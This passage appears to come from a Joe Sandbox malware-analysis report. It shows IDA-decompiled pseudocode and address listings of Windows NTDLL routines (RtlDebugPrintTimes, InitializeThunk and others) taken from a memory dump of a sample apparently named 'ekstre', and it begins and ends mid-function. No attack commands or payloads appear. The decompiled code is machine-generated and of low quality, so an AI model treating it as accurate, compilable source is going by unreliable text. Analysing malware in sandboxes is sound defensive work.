									 *((intOrPtr*)(_t202 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									_t176 =  *((intOrPtr*)(_t202 + 0x94));
									if( *((intOrPtr*)(_t202 + 0x94)) != 0) {
										L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t176);
									}
									_t180 = E34185D90(_t214,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
									 *((intOrPtr*)(_t202 + 0x94)) = _t180;
									if(_t180 != 0) {
										 *((intOrPtr*)(_t180 + 8)) = _v20;
										 *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x94)) + 0xc)) = _v16;
										_t220 =  *((intOrPtr*)(_t202 + 0x94));
										 *_t220 = _t220 + 0x10;
										 *((intOrPtr*)(_t220 + 4)) = 0;
										L341B88C0( *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x94)))), _v28, _v20);
										_t247 = _t247 + 0xc;
									}
									 *((intOrPtr*)(_t202 + 0x20)) = 0;
									E341824D0(_t236);
									_t210 = _v76;
									_t161 = _v80;
									_t200 = _v84;
									_t234 = _v88;
									L10:
									_t227 =  *((intOrPtr*)(_t238 + 0x1c));
									_v44 = _t227;
									if(_t227 != 0) {
										 *0x342691e0(_v48 + 0x38, _v52, _v63, _t161, _t210, _t234, _t200, _v36,  *((intOrPtr*)(_t238 + 0x20)));
										_v44();
									}
									_pop(_t235);
									_pop(_t243);
									_pop(_t201);
									return L341B4B50(0, _t201, _v8 ^ _t247, _t227, _t235, _t243);
								}
								_t172 = _v88;
								L31:
								_t214 = _t214 + 1;
								_t172 = _t172 + 0x18;
								_v92 = _t214;
								_v88 = _t172;
							} while (_t214 < 4);
							goto L34;
						}
					}
					L9:
					_t161 = _v104;
					_t210 = _v100;
					goto L10;
				}
				_t234 = _t233 | 0xffffffff;
				_t200 = _t234;
				_v84 = _t234;
				_v80 = _t200;
				if( *((intOrPtr*)(_t238 + 0x4c)) == _t151) {
					_t222 = _v72;
					_v105 = _v64;
					_t195 = _v76;
				} else {
					_t197 =  *((intOrPtr*)(_t238 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t197) {
						_v63 = _t197;
					}
					_t195 = _v76 |  *(_t238 + 0x40);
					_t222 = _v72 |  *(_t238 + 0x44);
					_t234 =  *(_t238 + 0x38);
					_t200 =  *(_t238 + 0x3c);
					_v76 = _t195;
					_v72 = _t222;
					_v84 = _t234;
					_v80 = _t200;
				}
				_v104 = _t195;
				_v100 = _t222;
				if( *((char*)(_t238 + 0xc4)) != 0) {
					_t226 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t238 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t238 + 0xc5));
						_t226 = _v48;
					}
					_t196 = _t195 |  *(_t238 + 0xb8);
					_t223 = _t222 |  *(_t238 + 0xbc);
					_t234 = _t234 &  *(_t238 + 0xb0);
					_t200 = _t200 &  *(_t238 + 0xb4);
					_v104 = _t196;
					_v76 = _t196;
					_v100 = _t223;
					_v72 = _t223;
					_v84 = _t234;
					_v80 = _t200;
				}
				_t155 = 0;
				if(_v105 == 0) {
					_v52 = 0;
					_t234 = 0;
					_t200 = 0;
					 *((intOrPtr*)(_t226 + 0x74)) = 0;
					goto L19;
				} else {
					_v52 = 1;
					goto L8;
				}
			}

0x34171059
0x34171063
0x34171069
0x3417106d
0x3417106f
0x34171076
0x3417107a
0x3417107e
0x34171088
0x34171093
0x34171097
0x3417109b
0x3417109b
0x3417109b
0x3417109d
0x341cf1b9
0x341cf1bc
0x341cf1bf
0x341cf1c3
0x341cf1c6
0x341cf1ca
0x341cf1ce
0x341cf1d1
0x341cf1d5
0x341cf1d9
0x341cf255
0x341cf255
0x341cf259
0x34171118
0x3417111c
0x341cf262
0x341cf262
0x341cf268
0x341cf26c
0x341cf26c
0x341cf270
0x00000000
0x00000000
0x341cf27e
0x341cf27f
0x341cf282
0x341cf289
0x00000000
0x00000000
0x00000000
0x341cf28b
0x341cf295
0x341cf29b
0x341cf29f
0x341cf2a3
0x341cf2a7
0x341cf2ab
0x341cf2b5
0x341cf2c0
0x341cf2c4
0x341cf2ca
0x341cf2d4
0x341cf2d8
0x341cf2dc
0x00000000
0x341cf2ed
0x341cf2ef
0x341cf2f2
0x341cf2f5
0x341cf2fc
0x341cf301
0x341cf303
0x341cf306
0x341cf30a
0x341cf30e
0x341cf312
0x00000000
0x00000000
0x341cf323
0x341cf327
0x341cf348
0x341cf34d
0x341cf351
0x341cf354
0x341cf357
0x341cf35c
0x00000000
0x00000000
0x341cf362
0x341cf366
0x341cf36a
0x341cf378
0x341cf37b
0x341cf383
0x341cf392
0x341cf392
0x341cf3aa
0x341cf3af
0x341cf3b7
0x341cf3bd
0x341cf3ca
0x341cf3cd
0x341cf3d6
0x341cf3da
0x341cf3ed
0x341cf3f2
0x341cf3f2
0x341cf3f8
0x341cf3fb
0x341cf400
0x341cf404
0x341cf408
0x341cf40c
0x3417112a
0x3417112a
0x3417112d
0x34171133
0x34171153
0x34171159
0x34171159
0x34171163
0x34171164
0x34171165
0x34171170
0x34171170
0x341cf329
0x341cf32d
0x341cf32d
0x341cf32e
0x341cf331
0x341cf335
0x341cf339
0x00000000
0x341cf33e
0x341cf2dc
0x34171122
0x34171122
0x34171126
0x00000000
0x34171126
0x341710a3
0x341710a6
0x341710a8
0x341710ac
0x341710b3
0x341cf1e1
0x341cf1e5
0x341cf1e9
0x341710b9
0x341710b9
0x341710bc
0x341710c5
0x341710c7
0x341710c7
0x341710d3
0x341710d6
0x341710d9
0x341710dc
0x341710df
0x341710e3
0x341710e7
0x341710eb
0x341710eb
0x341710f6
0x341710fa
0x341710fe
0x341cf1fc
0x341cf200
0x341cf205
0x341cf20d
0x341cf211
0x341cf211
0x341cf215
0x341cf21b
0x341cf221
0x341cf227
0x341cf22d
0x341cf231
0x341cf235
0x341cf239
0x341cf23d
0x341cf241
0x341cf241
0x34171104
0x3417110a
0x341cf24a
0x341cf24e
0x341cf250
0x341cf252
0x00000000
0x34171110
0x34171110
0x00000000
0x34171110

APIs

RtlDebugPrintTimes.NTDLL ref: 34171153

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 1d8dbfca1c3720400b1ddd45bca2af6cd7381f50d9889001fc89d5eae6e3af61
Instruction ID: 527a5a66d46c1bf1e9808dd59a22b23f5824f820bb2ae7741c937da06b767f7b
Opcode Fuzzy Hash: 1d8dbfca1c3720400b1ddd45bca2af6cd7381f50d9889001fc89d5eae6e3af61
Instruction Fuzzy Hash: E5B113B56087809FD354CF28C980A5AFBF1BF88344F1449AEF8999B352D771E945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 341F55E0 Relevance: 1.7, APIs: 1, Instructions: 246
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E341F55E0(void* _a4) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				void _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				char _v108;
				void* _t84;
				signed char _t91;
				intOrPtr _t94;
				void* _t103;
				char* _t122;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t128;
				char* _t136;
				intOrPtr _t141;
				intOrPtr _t144;
				signed int _t145;
				signed int _t148;
				intOrPtr _t151;
				void* _t159;
				void* _t160;
				intOrPtr* _t161;

				_t159 = _a4;
				_push(4);
				_push(0x3000);
				_push(_t159);
				_push(0);
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_push( &_v8);
				_push(0xffffffff);
				_t141 = E341B2B10();
				if(_t141 >= 0) {
					_t145 = 0xb;
					memcpy(_v8, _t159, _t145 << 2);
					_push(0);
					_push(0);
					_push(0);
					_push(0x1f0003);
					_push( &_v20);
					_t141 = E341B2E30();
					if(_t141 < 0) {
						goto L27;
					}
					_t160 = _a4;
					_t91 =  *(_t160 + 4);
					_t148 = _t91 & 0x00000002;
					if((_t91 & 0x00000008) != 0) {
						_t148 = _t148 | 0x00000004;
					}
					_t141 = E341F5870(_t148 | 0x00000001, 0, 0, 0,  &_v108);
					if(_t141 != 0) {
						if(_t141 != 0x129) {
							 *((intOrPtr*)(_t160 + 0x1c)) = 0;
							 *((intOrPtr*)(_t160 + 0x20)) = 0;
							 *((intOrPtr*)(_t160 + 0x24)) = 0;
							 *((intOrPtr*)(_t160 + 0x28)) = 0;
							_t94 =  *((intOrPtr*)(_t160 + 0x10));
							if(_t94 != 0) {
								_push(0);
								_push(_t94);
								L341B2A70();
							}
							goto L27;
						}
						_push(0);
						 *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) = 1;
						_push(_v16);
						L341B2A70();
						_push(_v16);
						E341B2A80();
						if(_v12 != 0) {
							_push(0);
							_push(0);
							_push(_v12);
							L341B29D0();
							_push(_v12);
							E341B2A80();
						}
						_t161 =  *((intOrPtr*)(_v8 + 8));
						_t103 = _v8;
						if(_t161 == 0) {
							if(( *(_t103 + 4) & 0x00000004) == 0) {
								_push(0);
								_push(0xfffffffe);
								E341B4570();
							}
						} else {
							 *0x342691e0( *((intOrPtr*)(_t103 + 0xc)));
							 *_t161();
						}
						_push(0x8000);
						_v24 =  *_v8;
						_push( &_v24);
						_push( &_v8);
						_push(0xffffffff);
						_t141 = E341B2B90();
						_push(_t141);
						_push(0xffffffff);
						L8:
						E341B2C70();
						goto L27;
					}
					_t151 = _v104;
					_push(2);
					 *((intOrPtr*)(_t160 + 0x20)) = _v100;
					_push(0);
					 *((intOrPtr*)(_t160 + 0x24)) = _v96;
					_push(0x1f0003);
					 *((intOrPtr*)(_t160 + 0x28)) = _v92;
					_push( &_v16);
					_push(_t151);
					_push(_v20);
					 *((intOrPtr*)(_t160 + 0x1c)) = _t151;
					_push(0xffffffff);
					if(E341B2D70() >= 0) {
						_push(0);
						_push(4);
						_t122 =  &_v16;
						_push(_t122);
						_push(_t122);
						_push(_v104);
						_t141 = E341B2D50();
						if(_t141 < 0) {
							goto L7;
						}
						_t124 =  *((intOrPtr*)(_t160 + 0x18));
						if(_t124 == 0) {
							L15:
							_push(_v104);
							E341B4160();
							_push(0);
							_push(0);
							_push(_v20);
							L341B29D0();
							_t127 =  *((intOrPtr*)(_t160 + 0x10));
							_v28 = _t127;
							if(_t127 != 0) {
								_push(0);
								_t144 =  *((intOrPtr*)(_a4 + 0x14));
								_push(_t127);
								_t128 = L341B2A70();
								_push(0);
								_push(0);
								_push(_t144);
								_v32 = _t128;
								L341B29D0();
								_push(_v104);
								E341B2A80();
								_push(_v100);
								E341B2A80();
								_push(_v28);
								E341B2A80();
								_push(_t144);
								E341B2A80();
								_t141 = _v32;
							}
							goto L27;
						}
						_push(2);
						_push(0);
						_push(0x1f0003);
						_push( &_v12);
						_push(_v104);
						_push(_t124);
						_push(0xffffffff);
						_t141 = E341B2D70();
						if(_t141 < 0) {
							goto L7;
						}
						if(( *(_t160 + 4) & 0x00000010) == 0) {
							_push( *((intOrPtr*)(_t160 + 0x18)));
							E341B2A80();
						}
						_push(0);
						_push(4);
						_t136 =  &_v12;
						_push(_t136);
						_push(_t136);
						_push(_v104);
						_t141 = E341B2D50();
						if(_t141 < 0) {
							goto L7;
						} else {
							goto L15;
						}
					}
					L7:
					_push(_t141);
					_push(_v104);
					goto L8;
				} else {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					L27:
					if(_v20 != 0) {
						_push(_v20);
						E341B2A80();
					}
					_t84 = _v8;
					if(_t84 != 0) {
						_v24 =  *_t84;
						_push(0x8000);
						_push( &_v24);
						_push( &_v8);
						_push(0xffffffff);
						E341B2B90();
					}
					return _t141;
				}
			}

0x341f55ea
0x341f55f0
0x341f55f2
0x341f55f7
0x341f55f8
0x341f55f9
0x341f55fc
0x341f55ff
0x341f5602
0x341f5608
0x341f5609
0x341f5610
0x341f5614
0x341f562a
0x341f562b
0x341f5633
0x341f5634
0x341f5635
0x341f5636
0x341f563b
0x341f5641
0x341f5645
0x00000000
0x00000000
0x341f564b
0x341f564e
0x341f5653
0x341f5658
0x341f565a
0x341f565a
0x341f566d
0x341f5671
0x341f5783
0x341f5812
0x341f5815
0x341f5818
0x341f581b
0x341f581e
0x341f5823
0x341f5825
0x341f5826
0x341f5827
0x341f5827
0x00000000
0x341f5823
0x341f578f
0x341f5793
0x341f579a
0x341f579b
0x341f57a3
0x341f57a4
0x341f57ac
0x341f57ae
0x341f57af
0x341f57b0
0x341f57b3
0x341f57b8
0x341f57bb
0x341f57bb
0x341f57c3
0x341f57c6
0x341f57cb
0x341f57e2
0x341f57e4
0x341f57e5
0x341f57e7
0x341f57e7
0x341f57cd
0x341f57d3
0x341f57d9
0x341f57d9
0x341f57ef
0x341f57f6
0x341f57fc
0x341f5800
0x341f5801
0x341f5808
0x341f580a
0x341f580b
0x341f56b0
0x341f56b0
0x00000000
0x341f56b0
0x341f567a
0x341f567d
0x341f567f
0x341f5685
0x341f5686
0x341f568c
0x341f5691
0x341f5697
0x341f5698
0x341f5699
0x341f569c
0x341f569f
0x341f56aa
0x341f56ba
0x341f56bb
0x341f56bd
0x341f56c0
0x341f56c1
0x341f56c2
0x341f56ca
0x341f56ce
0x00000000
0x00000000
0x341f56d0
0x341f56d5
0x341f571a
0x341f571a
0x341f571d
0x341f5722
0x341f5723
0x341f5724
0x341f5727
0x341f572c
0x341f572f
0x341f5734
0x341f5743
0x341f5745
0x341f5748
0x341f5749
0x341f574e
0x341f5750
0x341f5752
0x341f5753
0x341f5756
0x341f575b
0x341f575c
0x341f5761
0x341f5762
0x341f5767
0x341f576a
0x341f576f
0x341f5770
0x341f5775
0x341f5775
0x00000000
0x341f5734
0x341f56d7
0x341f56d9
0x341f56da
0x341f56e2
0x341f56e3
0x341f56e6
0x341f56e7
0x341f56ee
0x341f56f2
0x00000000
0x00000000
0x341f56f9
0x341f56fe
0x341f56ff
0x341f56ff
0x341f5704
0x341f5705
0x341f5707
0x341f570a
0x341f570b
0x341f570c
0x341f5714
0x341f5718
0x00000000
0x00000000
0x00000000
0x00000000
0x341f5718
0x341f56ac
0x341f56ac
0x341f56ad
0x00000000
0x341f5616
0x341f561b
0x341f561c
0x341f561d
0x341f561e
0x341f582c
0x341f5830
0x341f5832
0x341f5835
0x341f5835
0x341f583a
0x341f583f
0x341f5843
0x341f5849
0x341f584e
0x341f5852
0x341f5853
0x341f5855
0x341f5855
0x341f5860
0x341f5860

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 58a21da527f2aa182511b6e9f61397a51e11fe602883b10300578dacc343aca6
Instruction ID: f2f39b46bfa565ecd97e99d6dca9979ffcab596d0ccaa8ef1f9f98a4eaacd9a4
Opcode Fuzzy Hash: 58a21da527f2aa182511b6e9f61397a51e11fe602883b10300578dacc343aca6
Instruction Fuzzy Hash: 3F817E71A00B08AFEB21CFA5CCC4E9FBBFDAF44750F100669E555AB191DB70A905CB94

Uniqueness

Uniqueness Score: -1.00%

Function 34177623 Relevance: 1.7, APIs: 1, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E34177623(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _t69;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t75;
				signed int _t81;
				signed int _t82;
				signed int _t89;
				signed int _t90;
				void* _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t102;
				intOrPtr _t113;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr _t130;
				intOrPtr _t132;
				signed int _t133;
				signed int _t135;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t142;
				intOrPtr _t143;
				intOrPtr _t144;
				intOrPtr _t145;
				intOrPtr _t146;
				void* _t160;

				_t145 = __edx;
				_t138 = __ecx;
				_v32 = __edx;
				_v28 = __ecx;
				if(E34183C40() != 0) {
					_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				} else {
					_t69 = 0x7ffe0386;
				}
				if( *_t69 != 0) {
					E34244F7C(((0 | _a4 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + _t145, _t138);
				}
				goto L3;
				do {
					do {
						L3:
						_t71 =  *0x342667f0; // 0x0
						_t130 =  *0x342667f4; // 0x0
						_v20 = _t71;
						_v8 = _t130;
						_v16 =  *0x7FFE03B4;
						_v12 =  *0x7ffe03b0;
						while(1) {
							_t146 =  *0x7ffe000c;
							_t99 =  *0x7FFE0008;
							if(_t146 ==  *0x7FFE0010) {
								goto L5;
							}
							asm("pause");
						}
						L5:
						_t132 = _v8;
						_t141 = _v16;
						_t74 =  *0x7ffe03b0;
						_t113 =  *((intOrPtr*)(0x7ffe03b4));
						_v24 = _t74;
					} while (_v12 != _t74 || _t141 != _t113);
					_t75 =  *0x342667f0; // 0x0
					_t142 =  *0x342667f4; // 0x0
					_v16 = _t142;
					_t143 = _v20;
				} while (_t143 != _t75 || _t132 != _v16);
				asm("sbb esi, ecx");
				_t101 = _t99 - _v24 - _t143;
				_t144 = _v28;
				asm("sbb esi, edx");
				_t20 = _t144 + 0x90; // 0x90
				L34182330(_t20, _t20);
				 *(_t144 + 0xde) = 0;
				if(( *(_t144 + 0xde) & 0x00000004) != 0) {
					_t60 = _t144 + 0x90; // 0x90
					 *(_t144 + 0xd8) = 0;
					 *((intOrPtr*)(_t144 + 0xc8)) = 0;
					 *((intOrPtr*)(_t144 + 0xcc)) = 0;
					 *((intOrPtr*)(_t144 + 0xd0)) = 0;
					E341824D0(_t60);
					_t81 = L342449D2( *((intOrPtr*)(_t144 + 0xd0)));
					L20:
					_t82 = _t81 | 0xffffffff;
					asm("lock xadd [edi], eax");
					if(_t82 == 0) {
						 *0x342691e0(_t144);
						return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t144 + 4))))))();
					}
					return _t82;
				}
				if( *((intOrPtr*)(_t144 + 0xdd)) != 0) {
					 *((intOrPtr*)(_t144 + 0xc8)) = 0;
					 *((intOrPtr*)(_t144 + 0xcc)) = 0;
					if(E341ACC67() != 0) {
						goto L18;
					}
					goto L19;
				} else {
					_t133 =  *(_t144 + 0xd8);
					if(_t133 != 0) {
						if(_a4 != 0) {
							_t119 = _t101;
							_v8 = _t146;
						} else {
							_t119 =  *((intOrPtr*)(_t144 + 0xc8));
							_v8 =  *((intOrPtr*)(_t144 + 0xcc));
						}
						_t89 = _t133;
						_t135 = _t89 * 0x2710 >> 0x20;
						_t90 = _t89 * 0x2710;
						_t120 = _t119 + _t90;
						_v12 = _t90;
						_t91 = _v8;
						asm("adc eax, edx");
						_v24 = 0x2710;
						_v28 = _t120;
						_v8 = _t91;
						 *((intOrPtr*)(_t144 + 0xc8)) = _t120;
						 *((intOrPtr*)(_t144 + 0xcc)) = _t91;
						_t160 = _t91 - _t146;
						if(_t160 <= 0 && (_t160 < 0 || _t120 <= _t101)) {
							asm("sbb eax, [ebp-0x4]");
							_t97 = E341B6540(_t101 - _v28, _t146, _v12, _t135);
							_t91 = _v24;
							asm("sbb eax, edx");
							 *((intOrPtr*)(_t144 + 0xc8)) = _v12 - _t97 + _t101;
							asm("adc eax, esi");
							 *((intOrPtr*)(_t144 + 0xcc)) = _v24;
						}
						asm("lock inc dword [edi]");
						_t102 = _v32;
						L34182330(_t91, _t102);
						_t43 = _t102 + 0x50; // 0x50
						L341779D1(_t43, _t144);
						_t44 = _t102 + 0x50; // 0x50
						E341777F9(_t44, 0);
						E341824D0(_t102);
					}
					L18:
					L34181BE7(_t144);
					L19:
					_t45 = _t144 + 0x90; // 0x90
					_t81 = E341824D0(_t45);
					goto L20;
				}
			}

0x3417762e
0x34177630
0x34177632
0x34177635
0x3417763f
0x341d171a
0x34177645
0x34177645
0x34177645
0x3417764d
0x341d1737
0x341d1737
0x00000000
0x34177653
0x34177653
0x34177653
0x34177653
0x3417765d
0x34177663
0x34177666
0x34177673
0x34177676
0x3417767f
0x3417767f
0x34177681
0x34177687
0x00000000
0x00000000
0x341777f2
0x341777f2
0x3417768d
0x3417768d
0x34177695
0x34177698
0x3417769a
0x3417769d
0x341776a0
0x341776a9
0x341776ae
0x341776b4
0x341776b7
0x341776ba
0x341776c6
0x341776c8
0x341776ca
0x341776cd
0x341776cf
0x341776d6
0x341776e3
0x341776eb
0x341d1747
0x341d174e
0x341d1754
0x341d175a
0x341d1760
0x341d1766
0x341d176d
0x3417778a
0x3417778a
0x3417778d
0x34177791
0x341d177f
0x00000000
0x341d1785
0x3417779b
0x3417779b
0x341776f7
0x341777cf
0x341777d5
0x341777e4
0x00000000
0x00000000
0x00000000
0x341776fd
0x341776fd
0x34177705
0x3417770a
0x341777e8
0x341777ea
0x34177710
0x34177716
0x3417771c
0x3417771c
0x3417771f
0x34177726
0x34177726
0x34177728
0x3417772a
0x3417772d
0x34177730
0x34177732
0x34177735
0x34177738
0x3417773b
0x34177741
0x34177747
0x34177749
0x341777a9
0x341777ae
0x341777b8
0x341777bb
0x341777bf
0x341777c5
0x341777c7
0x341777c7
0x34177751
0x34177754
0x34177758
0x3417775f
0x34177762
0x34177769
0x3417776c
0x34177772
0x34177772
0x34177777
0x34177779
0x3417777e
0x3417777e
0x34177785
0x00000000
0x34177785

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61e7e50388e722c754ba23c49e39f097f8e30780ff7cd4d0de8ad8ac4a38a43f
Instruction ID: c1b5c9257ca6e761cc58601e376fefa5127805e07421d6ade79acfe4af265266
Opcode Fuzzy Hash: 61e7e50388e722c754ba23c49e39f097f8e30780ff7cd4d0de8ad8ac4a38a43f
Instruction Fuzzy Hash: DA615476A00A05EFEB08DF68C4C4A9DFBB6FF48344F24816AD429A7310DB74A9418FD0

Uniqueness

Uniqueness Score: -1.00%

Function 3417254C Relevance: 1.6, APIs: 1, Instructions: 119
timeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E3417254C(void* __ebx, intOrPtr __ecx, signed int __edi, void* __esi, void* __eflags) {
				signed int _v4;
				intOrPtr _v16;
				intOrPtr _v128;
				intOrPtr* _v132;
				char _v180;
				intOrPtr _v184;
				signed int _t41;
				void* _t50;
				void* _t61;
				intOrPtr _t66;
				signed int _t67;
				signed int _t68;
				signed int _t69;
				signed int _t75;
				intOrPtr _t76;
				intOrPtr* _t77;
				void* _t78;
				void* _t79;
				signed int _t80;
				signed int _t82;
				signed int _t84;
				intOrPtr* _t85;
				intOrPtr _t89;
				signed int _t90;
				intOrPtr _t92;
				void* _t108;

				_t61 = __ebx;
				_push(0xa8);
				_push(0x3424bbe0);
				E341C7C40(__ebx, __edi, __esi);
				_t89 = __ecx;
				_v184 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) != 0) {
					E341AC819(__ebx, __ecx, _t78, __edi, __ecx, __eflags);
					_t66 =  *((intOrPtr*)(__ecx + 8));
					_t82 = __edi | 0xffffffff;
					__eflags = _t82;
					asm("lock xadd [ecx], eax");
					if(_t82 == 0) {
						L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)),  *0x34266644, _t66);
					}
				} else {
					_t82 = __edi | 0xffffffff;
				}
				if( *((intOrPtr*)(_t89 + 0x38)) != _t82) {
					_push( *((intOrPtr*)(_t89 + 0x38)));
					L20();
				}
				_t39 =  *((intOrPtr*)(_t89 + 0x5c));
				if( *((intOrPtr*)(_t89 + 0x5c)) == 0) {
					L34182330(_t39, 0x34268a30);
					_v4 = 1;
					_t41 = _t89 + 0x60;
					_t79 =  *_t41;
					_t67 =  *(_t41 + 4);
					__eflags =  *(_t79 + 4) - _t41;
					if( *(_t79 + 4) != _t41) {
						goto L19;
					} else {
						__eflags =  *_t67 - _t41;
						if( *_t67 != _t41) {
							goto L19;
						} else {
							 *_t67 = _t79;
							 *(_t79 + 4) = _t67;
							 *(_t41 + 4) = _t41;
							 *_t41 = _t41;
							_v4 = 0xfffffffe;
							_t50 = E341CFC88();
							goto L10;
						}
					}
				} else {
					L34182330(_t39 + 0x2c, _t39 + 0x2c);
					_v4 = _v4 & 0x00000000;
					_t41 = _t89 + 0x60;
					_t79 =  *_t41;
					_t75 =  *(_t41 + 4);
					if( *(_t79 + 4) != _t41 ||  *_t75 != _t41) {
						L19:
						_t68 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t61);
						_push(_t89);
						_t90 = _v4;
						_push(_t82);
						__eflags = _t90;
						if(_t90 != 0) {
							_t41 = _t90 - 0x00000001 | 0x00000007;
							__eflags = _t41 - 0xffffffff;
							if(_t41 != 0xffffffff) {
								__eflags =  *_t90;
								if( *_t90 > 0) {
									__eflags =  *_t90 - 0x7fffffff;
									if( *_t90 != 0x7fffffff) {
										while(1) {
											_t80 =  *_t90;
											__eflags = _t80 - 0x7fffffff;
											if(_t80 == 0x7fffffff) {
												break;
											}
											_t84 = _t80 - 1;
											_t41 = _t80;
											_t68 = _t84;
											asm("lock cmpxchg [esi], ecx");
											__eflags = _t41 - _t80;
											if(_t41 != _t80) {
												continue;
											}
											L27:
											__eflags =  *0x34266910;
											if( *0x34266910 != 0) {
												asm("lock xadd [esi+0xe8], eax");
												_t41 = E3419C000(_t68, "true", 4, 0xbadc99 + _t90, 0);
											}
											__eflags = _t84;
											if(_t84 == 0) {
												__eflags =  *0x34266911;
												_t69 = _t90;
												if(__eflags != 0) {
													_t41 = L341FDA40(0x7fffffff, _t69, _t84, _t90, __eflags);
												} else {
													_t41 = E341692AF(_t69);
												}
											}
											goto L21;
										}
										_t84 = 0x7fffffff;
										goto L27;
									}
								}
							}
						}
						L21:
						return _t41;
					} else {
						 *_t75 = _t79;
						 *(_t79 + 4) = _t75;
						 *(_t41 + 4) = _t41;
						 *_t41 = _t41;
						_v4 = 0xfffffffe;
						_t50 = E34172688(_t89);
						_t76 =  *((intOrPtr*)(_t89 + 0x5c));
						_t108 = _t76 -  *0x34266890; // 0x3f207c0
						if(_t108 != 0) {
							__eflags = _t76 -  *0x34266888; // 0x0
							if(__eflags != 0) {
								asm("lock xadd [ecx], edi");
								_t87 = _t82 - 1;
								__eflags = _t82 - 1;
								if(__eflags == 0) {
									_t50 = E3416B705(_t61, _t76, _t87, _t89, __eflags);
								}
							} else {
								_t79 = 0x3426688c;
								_t77 = 0x34266888;
								goto L9;
							}
						} else {
							_t79 = 0x34266894;
							_t77 = 0x34266890;
							L9:
							_t50 = E34172712(_t61, _t77, _t79, _t82, _t89, _t108);
						}
						L10:
						_t85 =  *((intOrPtr*)(_t89 + 0x10));
						if(_t85 != 0) {
							E341B8F40( &_v180, 0, 0x98);
							_v132 = _t85;
							_t92 =  *((intOrPtr*)(_t89 + 0x34));
							_v128 = _t92;
							E34176D60( &_v180);
							 *0x342691e0( &_v180, _t92);
							 *_t85();
							_t50 = E341761C3( &_v180, _t79);
						}
						 *[fs:0x0] = _v16;
						return _t50;
					}
				}
			}

0x3417254c
0x3417254c
0x34172551
0x34172556
0x3417255b
0x3417255d
0x34172567
0x34172645
0x3417264a
0x3417264d
0x3417264d
0x34172652
0x34172656
0x341cfc1b
0x341cfc1b
0x3417256d
0x3417256d
0x3417256d
0x34172573
0x34172575
0x34172578
0x34172578
0x3417257d
0x34172582
0x341cfc42
0x341cfc47
0x341cfc4e
0x341cfc51
0x341cfc53
0x341cfc56
0x341cfc59
0x00000000
0x341cfc5f
0x341cfc5f
0x341cfc61
0x00000000
0x341cfc67
0x341cfc67
0x341cfc69
0x341cfc6c
0x341cfc6f
0x341cfc71
0x341cfc78
0x00000000
0x341cfc78
0x341cfc61
0x34172588
0x3417258c
0x34172591
0x34172595
0x34172598
0x3417259a
0x341725a0
0x34172695
0x34172697
0x34172698
0x3417269a
0x3417269b
0x3417269c
0x3417269d
0x3417269e
0x3417269f
0x341726a5
0x341726a6
0x341726a7
0x341726aa
0x341726ab
0x341726ad
0x341726b9
0x341726bc
0x341726bf
0x341726c1
0x341726c4
0x341726cb
0x341726cd
0x341726cf
0x341726cf
0x341726d1
0x341726d3
0x00000000
0x00000000
0x341726d5
0x341726d8
0x341726da
0x341726dc
0x341726e0
0x341726e2
0x00000000
0x00000000
0x341726e4
0x341726e4
0x341726eb
0x341cfc96
